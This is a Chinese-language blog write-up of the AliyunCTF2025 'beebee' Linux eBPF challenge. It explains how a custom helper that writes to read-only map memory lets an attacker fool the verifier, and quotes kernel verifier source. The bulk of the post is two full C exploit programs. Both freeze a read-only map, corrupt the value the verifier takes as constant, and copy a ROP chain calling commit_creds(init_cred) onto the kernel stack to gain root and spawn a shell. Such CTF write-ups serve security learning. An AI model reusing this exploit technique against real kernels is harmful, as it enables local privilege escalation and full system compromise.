Dig into ebpf (一) —— AliyunCTF2025 beebee

拖了一年之后终于开始接触ebpf了, 但ebpf的verifier细节太多, 直接上源码分析工作量太大, 正好这道beebee不太需要理解verifier的细节hh.

分析

题目添加了一个helper函数, 作用实质是一个内存写8字节原语. 由于res指针具有MEM_RDONLY标志, 意味着这可以改写到一些只读内存. (从bpf_aliyunctf_xor的实现可以看出来, 这个”只读”的概念是基于ebpf层面而不是页面权限层面)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* MEM_RDONLY -- MEM is read-only. When applied on bpf_arg, it indicates the arg is
* compatible with both mutable and immutable memory.
*/
/* ARG_PTR_TO_MEM -- pointer to valid memory (stack, packet, map value) */

const struct bpf_func_proto bpf_aliyunctf_xor_proto = {
.func = bpf_aliyunctf_xor,
.gpl_only = false,
.ret_type = RET_INTEGER,
.arg1_type = ARG_PTR_TO_MEM | MEM_RDONLY,
.arg2_type = ARG_CONST_SIZE,
.arg3_type = ARG_PTR_TO_FIXED_SIZE_MEM | MEM_UNINIT | MEM_ALIGNED | MEM_RDONLY,
.arg3_size = sizeof(s64),
};

BPF_CALL_3(bpf_aliyunctf_xor, const char *, buf, size_t, buf_len, s64 *, res) {
s64 _res = 2025;

if (buf_len != sizeof(s64))
return -EINVAL;

_res ^= *(s64 *)buf;
*res = _res;

return 0;
}



改写只读内存的原语如何利用? 首先想到的是改写一些敏感数据, 比如用户态利用字符串表符号表的操作. 但ARG_PTR_TO_MEM的类型其实只能指向stack,packet, map value, 而这些数据其实在合法范围内都是非敏感的.

于是回到ebpf exploit的经典思路 —— 欺骗verifier. 如果verifier将RDONLY内存中读取的值认为是定值, 而我们通过该helper方法修改它, 这就能造成verifier与运行时不一致的情况.

首先尝试在kernel/bpf目录下搜索MEM_RDONLY, 但并没有找到verifier对该标志内存访问的特殊处理. 转而搜索RDONLY, 找到bpf_map_is_rdonly函数.

从注释中得知, 如果map

  • 在创建时指定了BPF_F_RDONLY_PROG标志(程序侧无法修改)
  • 在用户空间进行了初始化并被frozen(用户侧无法修改)
  • 所有并行/未完成的更新操作已经完成

则该map是只读的.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static bool bpf_map_is_rdonly(const struct bpf_map *map)
{
/* A map is considered read-only if the following condition are true:
*
* 1) BPF program side cannot change any of the map content. The
* BPF_F_RDONLY_PROG flag is throughout the lifetime of a map
* and was set at map creation time.
* 2) The map value(s) have been initialized from user space by a
* loader and then "frozen", such that no new map update/delete
* operations from syscall side are possible for the rest of
* the map's lifetime from that point onwards.
* 3) Any parallel/pending map update/delete operations from syscall
* side have been completed. Only after that point, it's safe to
* assume that map value(s) are immutable.
*/
return (map->map_flags & BPF_F_RDONLY_PROG) &&
READ_ONCE(map->frozen) &&
!bpf_map_write_active(map);
}

查找交叉引用, 找到check_mem_access函数中与我们预期情况相符的特殊处理, 将value_reg标记为vefify时的已知值.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/* check whether memory at (regno + off) is accessible for t = (read | write)
* if t==write, value_regno is a register which value is stored into memory
* if t==read, value_regno is a register which will receive the value from memory
* if t==write && value_regno==-1, some unknown value is stored into memory
* if t==read && value_regno==-1, don't care what we read from memory
*/
static int check_mem_access(struct bpf_verifier_env *env, int insn_idx, u32 regno,
int off, int bpf_size, enum bpf_access_type t,
int value_regno, bool strict_alignment_once, bool is_ldsx)
{
......
} else if (t == BPF_READ && value_regno >= 0) {
struct bpf_map *map = reg->map_ptr;

/* if map is read-only, track its contents as scalars */
if (tnum_is_const(reg->var_off) &&
bpf_map_is_rdonly(map) &&
map->ops->map_direct_value_addr) {
int map_off = off + reg->var_off.value;
u64 val = 0;

err = bpf_map_direct_read(map, map_off, size,
&val, is_ldsx);
if (err)
return err;

regs[value_regno].type = SCALAR_VALUE;
__mark_reg_known(&regs[value_regno], val);
} else {
mark_reg_unknown(env, regs, value_regno);
}
}
......

利用

利用思路

于是思路明确了, 首先创建一个只读的map, 保存一个offset(初始设为0). 通过helper将这个offset改为一个可以越界的偏移, 然后将skb中保存的ROP链复制到当前栈帧加上该offset的位置, 由于map只读且offset的初值为0, 所以verifier会认为这次写入是在合法范围内的.
通过这样的方式即可覆盖返回地址ROP提权.

不过还是确认一下源码中STX到栈的相关范围检查

1
2
3
4
5
6
7
8
9
10
11
12
} else if (reg->type == PTR_TO_STACK) {
/* Basic bounds checks. */
err = check_stack_access_within_bounds(env, regno, off, size, ACCESS_DIRECT, t);
if (err)
return err;

if (t == BPF_READ)
err = check_stack_read(env, regno, off, size,
value_regno);
else
err = check_stack_write(env, regno, off, size,
value_regno, insn_idx);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
/* Check that the stack access at 'regno + off' falls within the maximum stack
* bounds.
*
* 'off' includes `regno->offset`, but not its dynamic part (if any).
*/
static int check_stack_access_within_bounds(
struct bpf_verifier_env *env,
int regno, int off, int access_size,
enum bpf_access_src src, enum bpf_access_type type)
{
struct bpf_reg_state *regs = cur_regs(env);
struct bpf_reg_state *reg = regs + regno;
struct bpf_func_state *state = func(env, reg);
s64 min_off, max_off;
int err;
char *err_extra;

if (src == ACCESS_HELPER)
/* We don't know if helpers are reading or writing (or both). */
err_extra = " indirect access to";
else if (type == BPF_READ)
err_extra = " read from";
else
err_extra = " write to";

if (tnum_is_const(reg->var_off)) {
// 如果reg的偏移是常量, 那么访问范围就是[value+off,value+off+access_size)
min_off = (s64)reg->var_off.value + off;
max_off = min_off + access_size;
} else {
// 否则用smin_value/smax_value来算范围
if (reg->smax_value >= BPF_MAX_VAR_OFF ||
reg->smin_value <= -BPF_MAX_VAR_OFF) {
verbose(env, "invalid unbounded variable-offset%s stack R%d\n",
err_extra, regno);
return -EACCES;
}
min_off = reg->smin_value + off;
max_off = reg->smax_value + off + access_size;
}

// 根据[min_off,max_off]h和access判断本次读取是否合法
err = check_stack_slot_within_bounds(env, min_off, state, type);
if (!err && max_off > 0)
err = -EINVAL; /* out of stack access into non-negative offsets */
if (!err && access_size < 0)
/* access_size should not be negative (or overflow an int); others checks
* along the way should have prevented such an access.
*/
err = -EFAULT; /* invalid negative access size; integer overflow? */

if (err) {
if (tnum_is_const(reg->var_off)) {
verbose(env, "invalid%s stack R%d off=%d size=%d\n",
err_extra, regno, off, access_size);
} else {
char tn_buf[48];

tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
verbose(env, "invalid variable-offset%s stack R%d var_off=%s size=%d\n",
err_extra, regno, tn_buf, access_size);
}
return err;
}

// 增长已分配栈到-min_off
return grow_stack_state(env, state, round_up(-min_off, BPF_REG_SIZE));
}

check_stack_slot_within_bounds限制读写的范围在栈内, 且根据allow_uinit_stack来判断是否需要限制未分配的栈空间读取.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* Check that the stack access at the given offset is within bounds. The
* maximum valid offset is -1.
*
* The minimum valid offset is -MAX_BPF_STACK for writes, and
* -state->allocated_stack for reads.
*/
static int check_stack_slot_within_bounds(struct bpf_verifier_env *env,
s64 off,
struct bpf_func_state *state,
enum bpf_access_type t)
{
int min_valid_off;

if (t == BPF_WRITE || env->allow_uninit_stack)
min_valid_off = -MAX_BPF_STACK;
else
min_valid_off = -state->allocated_stack;

if (off < min_valid_off || off > -1)
return -EACCES;
return 0;
}

明确思路后编写exp, 调试主要是看verifier的报错信息, 以及直接调试jit编译出来的机器码.
例如下图即为map不为只读的情况下, 读出的offset会被认为是无界值, 而无界值与指针的运算是不允许的.

EXP1

在root用户下调完exp后, 切换到普通用户测试, 正准备收工的笔者发现, exp1在普通用户下没法提权.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#include <kernelpwn.h>
#include "bpf.h"

int map_fd;

void initMap()
{
map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
sizeof(int), sizeof(int64_t), 1, BPF_F_RDONLY_PROG);

int key = 0;
size_t value = 0;
bpf_update_elem(map_fd, &key, &value, 0);

int err = bpf_map_freeze(map_fd);
if(err == -1)
{
loge("bpf(BPF_MAP_FREEZE):%s",bpf_log_buf);
err_exit("BPF_MAP_FREEZE");
}
}


size_t prepare_kernel_cred = 0xffffffff810c1c60;
size_t init_cred = 0xffffffff82a52fa0;
size_t commit_creds = 0xffffffff810c19b0;
size_t do_sys_vfork = 0xffffffff8108d2f0;
size_t msleep = 0xffffffff8113dfd0;
size_t pop_rdi = 0xffffffff81142d79;


#define BPF_FUNC_aliyunctf_xor 212
#define RETADDR_OFFSET 0x28

int main()
{
int err;

initMap();

size_t ropchain[] = {
pop_rdi,
init_cred,
commit_creds,
do_sys_vfork
};

struct bpf_insn insns[] = {
BPF_MOV64_IMM(BPF_REG_0, 0xdeadbeef),

// reg9: offset
// reg6: map_fd
// reg8: skb

BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_6, map_fd),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),


BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_2,-8),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 1),
BPF_EXIT_INSN(),


BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, ((sizeof(ropchain)+8)^2025)),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_1,-8),
BPF_MOV64_IMM(BPF_REG_2,8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_7),
BPF_EMIT_CALL(BPF_FUNC_aliyunctf_xor),

BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -sizeof(ropchain)),
BPF_ALU64_REG(BPF_ADD, BPF_REG_3, BPF_REG_9),
BPF_MOV64_IMM(BPF_REG_4, sizeof(ropchain)),
BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

BPF_EXIT_INSN(),

};


int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
insns, sizeof(insns) / sizeof(insns[0]),
"GPL v2");
if (progfd == -1) {
loge("bpf(BPF_PROG_LOAD):%s",bpf_log_buf);
exit(-1);
}



err = bpf_prog_skb_run(progfd, ropchain, sizeof(ropchain));

system("/bin/sh");

return 0;
}

对比root(上图)和普通用户(下图)生成的机器码, 最担心的情况还是发生了. 其实在最开始分析利用方法的时候我就在思考这样一个场景, 既然verifier已经能确定从只读map中读出的数据值, 那为什么不直接在jitcode中进行常量优化呢? 下图中,offset直接使用了r10的零值, 而不是从map中读取到的r15值. (为啥只在普通用户下有这个优化……)

EXP2

笔者尝试思考一种无法进行常量优化的场景, 但这似乎与欺骗verifier的前提矛盾, 无果.
无奈之下, 尝试用改写size的方式替代改写offset的方式来碰碰运气.

然后, 它成了……(不理解, 看看之后有没有时间研究一下).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <kernelpwn.h>
#include "bpf.h"

int map_fd;

void initMap()
{
map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
sizeof(int), sizeof(int64_t), 1, BPF_F_RDONLY_PROG);

int key = 0;
size_t value = 8;
bpf_update_elem(map_fd, &key, &value, 0);

int err = bpf_map_freeze(map_fd);
if(err == -1)
{
loge("bpf(BPF_MAP_FREEZE):%s",bpf_log_buf);
err_exit("BPF_MAP_FREEZE");
}
}


size_t prepare_kernel_cred = 0xffffffff810c1c60;
size_t init_cred = 0xffffffff82a52fa0;
size_t commit_creds = 0xffffffff810c19b0;
size_t do_sys_vfork = 0xffffffff8108d2f0;
size_t msleep = 0xffffffff8113dfd0;
size_t pop_rdi = 0xffffffff81142d79;


#define BPF_FUNC_aliyunctf_xor 212
#define RETADDR_OFFSET 0x28

int main()
{
int err;

initMap();

size_t ropchain[] = {
0,
0,
pop_rdi,
init_cred,
commit_creds,
do_sys_vfork
};

struct bpf_insn insns[] = {
BPF_MOV64_IMM(BPF_REG_0, 0xdeadbeef),

// reg9: size
// reg6: map_fd
// reg8: skb

BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_6, map_fd),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),


BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_2,-8),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 1),
BPF_EXIT_INSN(),


BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, ((sizeof(ropchain))^2025)),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_1,-8),
BPF_MOV64_IMM(BPF_REG_2,8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_7),
BPF_EMIT_CALL(BPF_FUNC_aliyunctf_xor),

BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -8),
BPF_MOV64_REG(BPF_REG_4, BPF_REG_9),
BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

BPF_EXIT_INSN(),

};


int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
insns, sizeof(insns) / sizeof(insns[0]),
"GPL v2");
if (progfd == -1) {
loge("bpf(BPF_PROG_LOAD):%s",bpf_log_buf);
exit(-1);
}



err = bpf_prog_skb_run(progfd, ropchain, sizeof(ropchain));

system("/bin/sh");

return 0;
}
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2025 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信